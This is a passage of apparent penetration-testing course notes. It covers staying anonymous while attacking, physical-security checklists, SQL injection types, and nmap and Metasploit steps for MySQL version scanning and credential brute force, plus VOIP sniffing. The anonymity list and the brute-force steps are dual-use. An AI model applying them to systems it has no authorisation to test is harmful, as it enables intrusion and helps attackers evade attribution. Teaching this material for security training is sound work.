5663-> Black Box : Black box testing refers to testing a system without having specific knowledge to the internal workings of the system, no access to the source code, and no knowledge of the architecture.
5664 Webiste www.target.com IP List in scope.
5665
5666
56677 PHASES TO BE ANONYMOUS
5668========================
56691. Don't ever use your personal home laptop.
56702. Use the linux OS as LIVE. (Kali Live) / Persistence Mode
56713. Before Connecting to the Internet, Change your MAC Addresses. (Mac Changer)
56724. Change the User Agent of your Browser (User Agent Switcher)
56735. Setup Proxy Chains (Nullbyte)
56746. Connect to the Public WIFI's
56757. Use Tor with VPN. Enjoy :)
5676
5677--------------------------------------------------------------------------------------------------
5678
5679
5680
5681 SESSION 19
5682 ==========
5683
5684PHYSICAL SECURITY PENETRATION TESTING
5685=====================================
5686
5687After virtual security auditings major coprorations may not deploy a huge amount and resources to ensure the physical environment is secure. Hence auditing physical security again can be a big task for these organisations.
5688
5689Referring ISO27001 , ISO27002
5690
5691Major Organisations which need physical Security.
5692--------------------------------------------------
5693- Nuclear Power Plants
5694- Space Stations
5695- Hydrogen Experimental sites
5696 etc etc etc...
5697
5698Physical Security Check list Areas
5699----------------------------------
57001. Organisation Surroundings
57012. Ensure the people in the organisation following the physical security rules.
5702- They must use icards for the authentication
5703- There must be a log manager of all the in-out activities
5704- There should be a physical resource person(team) who is monitoring 24*7 the in-out operational work by the employees.
5705- Reason for the visit should be validated.
5706
5707Check list for entering the server room.
5708-> Name of the vistor
5709-> Company of the visitor
5710-> Company icard scanned copy.
5711-> Adhar Card/dl etc
5712-> Name of Person who is bringing the visitor
5713-> Company he belongs to
5714-> ICard number
5715-> Devices they are carrying
5716-> Hand over your phone in switched off mode to the gatekeeper
5717-> Locker Keys will be given back to you.
5718
5719Within the working space physical security checklist
5720 - Clean Desk policy
5721 - After meeting and after all the chats and plans making, before you leave the office discussion room you have to clear the white board or glass on which you have wrote anything about the task to be executed.
5722 - You have to shredder any document before throwing it in dustbin.
5723
5724Dumpster Diving : Process in which where hacker sneak into the grabage of any home or organisations and look for something important.
5725
5726- Make sure people in organisation not write any kind of information on sticky notes and on their desk with marker or pen.
5727
5728Serious Security Checklist
5729--------------------------
57301. There must be fire extinguisher in all the rooms and places in the organisation.
57312. There must an AMC with the fire departmnet company.
57323. There must be biometric authentication on server room.
57334. There must be cameras inside the server room.
57345. Electricity room and generater room should be at seprate locations.
5735
5736ISO 27001 : Physical Security Control List
5737
5738Watch Here Red Team Breach: https://www.youtube.com/watch?v=pL9q2lOZ1Fw
5739
5740--------------------------------------------------------------------------------------------------
5741
5742Database Penetration Testing
5743----------------------------
57441. Authentication Bypass
57452. Union Based SQL Injection
57463. Blind Based SQL Injection
57474. Error Based SQL Injection
57485. Time Based SQL Injection
57496. Double Query SQL Injection
57507. Stacked Query SQL Injection
57518. Head Based SQL Injection
57529. Second Order SQL Injection
575310. Boolean Based SQL Injection
575411. XPath Injection
575512. LDAP Injection
5756
5757
5758Oracle
5759MS-SQL MYSQL : 5.0.45 Communicaty Edition
5760My-SQL : 3306
5761
5762
5763
5764Step 1: Scan the system with nmap and identify the database port and its version.
5765nmap -A Traget IP
5766nmap -sS -sC -sV 192.168.43.122 -p3306
5767
5768Banner Grabbing :
5769
5770msf > use auxiliary/scanner/mysql/mysql_version
5771msf auxiliary(scanner/mysql/mysql_version) > show options
5772
5773Module options (auxiliary/scanner/mysql/mysql_version):
5774
5775 Name Current Setting Required Description
5776 ---- --------------- -------- -----------
5777 RHOSTS yes The target address range or CIDR identifier
5778 RPORT 3306 yes The target port (TCP)
5779 THREADS 1 yes The number of concurrent threads
5780
5781msf auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.195.218
5782rhosts => 192.168.195.218
5783msf auxiliary(scanner/mysql/mysql_version) > run
5784
5785
5786Brute Force :
5787
5788Step 2: Scanning Version : mysql_version
5789Step 3: info
5790Step 4: Set RHOSTS <IP address>
5791Step 5: run
5792Step 6:use auxiliary/scanner/mysql/mysql_login
5793Step 7: set USER_FILE root/Desktop/usernames.lst
5794Step 8: set PASS_FILE root/Desktop/passwords.lst
5795Step 9: run
5796
5797
5798VOIP Pentesting : Voice Over Internet Protocol.
5799ITs a process in which we try to sniff the voice packets and conversations with in the organisation in which certain VOIP devices are being used for internal communication.
5800
5801Aviya : The most trusted brand in VOIP communication*
5802
5803Put call through VOIP --> Target
5804~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5805Attacker : Intercept via Cain n Abel having SIP intercept facility.
5806
5807VPN Pentesting
5808---------------
5809Is to encrypt the packets coming out from devices.
5810
5811------------
5812
5813lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html
5814
5815
5816
5817 SESSION 20
5818 ==========
5819
5820BoF PART 2
5821==========
5822
5823https://drive.google.com/open?id=1XBV7jiG2pUMU7zC9y5FuoeBc6SOm_JaL